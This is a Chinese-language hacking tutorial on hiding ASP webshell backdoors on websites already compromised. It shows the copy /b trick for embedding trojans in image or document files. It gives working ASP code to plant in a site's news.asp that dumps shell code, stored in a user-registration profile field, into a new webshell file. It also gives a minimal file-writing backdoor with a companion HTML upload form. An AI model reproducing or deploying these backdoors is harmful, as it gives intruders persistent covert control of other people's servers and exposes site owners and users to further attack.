前言:好長時間了,從剛開始的站點管理器到現在流行的幾款asp後門,相信大多數網管都能說出這些經典webshell的名字,如海洋、老兵、藍屏等,也相信大多數的網管學會了關鍵字的搜尋方法來搜尋這些木馬,當然現在的時間如果再象隱藏後門就要講些技巧啦,俗話說的好「佛高一尺,我高一丈」。
我不否認n早前的那個把asp木馬寫到圖片檔案中不失為一種好的方法,其實不只可以寫到圖片啦寫到mp3檔裡寫到doc文件裡都是可以的啦。
copy 檔案名稱/參數+ 檔案名稱/參數產生檔案名稱
這樣的方法可以很靈活的運用來達到隱藏檔案的目的,具體的參數就是/a以acsic碼方式,/b二進位方式,就不囉嗦這些了,至於如何上傳webshell,什麼是webshell也不屬於本文的討論範圍。今天要講的是如何把後門放到後綴.mdb的資料庫中,前提是在我們拿到一個webshell之後…
我們所知道的,很多站點在用戶註冊的時候要讓填好多東西例如:用戶名、密碼、QQ、信箱、個人簡介、電話、聯絡方式、住址一類的。而對應到資料庫中也會有對應的表格、欄位、值。我今天要做的就是,我註冊一個用戶在我的個人簡介的地方上寫入shell代碼,然後修改他站點上的一個文件,使用的時候觸發這個文件,就把我個人簡歷中的shell代碼,備份到目前目錄下。
廢話少說了,大家看程式碼:
<%
if request("action")="firefox" then
fname=request.querystring("fn")
tname=request.querystring("tn")
bname=request.querystring("bn")
id=request.querystring("id")
idvalue=request.querystring("idv")
set rs=server.createobject("ADODB.recordset")
sql="select "& bname & " from "&tname& " where "&id&"="&idvalue&""""
rs.open sql,conn,1,3
if not rs.eof then
content=rs(bname)
else
response.write "Nothing"
end if
set fso=Server.createObject("Scripting.FileSystemObject")
set txtfile=fso.createtextfile(server.mappath(fname))
txtfile.writeline(content)
txtfile.close
end if
%>
將上邊的程式碼加到網站的一個檔案中,如news.asp。根據我們了解的信息,在其網站註冊後,下載資料庫以查看結構。我註冊的firefox名字是在user表,其id值為119 用於存放我註冊履歷的表格欄位為jl。
news.asp?action=firefox&fn=firefox.asp&tn=user&bn=jl&id=id&idv=119
那麼在使用的時候我們就可以在news.asp相同目錄下寫入一個名為firefox.asp的webshell。以上可以說是千萬隱藏方法中的一種,下邊再說另一種更方便的隱藏方法,這個方法就和mdb後綴無關了。
同樣我們還是修改news.asp,將以下程式碼插入對方news.asp中:
<%
if request("action")="firefox" then
n=request.form("n")
c=request.form("c")
set fso=Server.createObject("Scripting.FileSystemObject")
set txtfile=fso.createtextfile(server.mappath(n))
txtfile.writeline(c)
txtfile.close
end if
%>
這段程式碼相對簡單些,算是木馬的服務端吧。使用的時候以這段程式碼配合:
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<title>Fst火狐技術聯盟[www.wrsky.com]</title>
<FORM action=" http://localhost/config.asp?action ... method=post>
<META content="MSHTML 6.00.2900.2180" name=GENERATOR></HEAD>
<BODY>Name:<INPUT size=50
name=n width="32"><BR><BR>Shell:<TEXTAREA name=c rows=10 cols=80
width="32"></TEXTAREA><INPUT type=submit value=Save></FORM></BODY></HTML>
將上述程式碼中的:「http://localhost/config.asp?action= firefox」替換成你的服務端位址,然後儲存為本機的.htm檔。本機開啟後定義要產生的檔案名稱、檔案內容、遠端提交, ok,又是一種留後門的方法。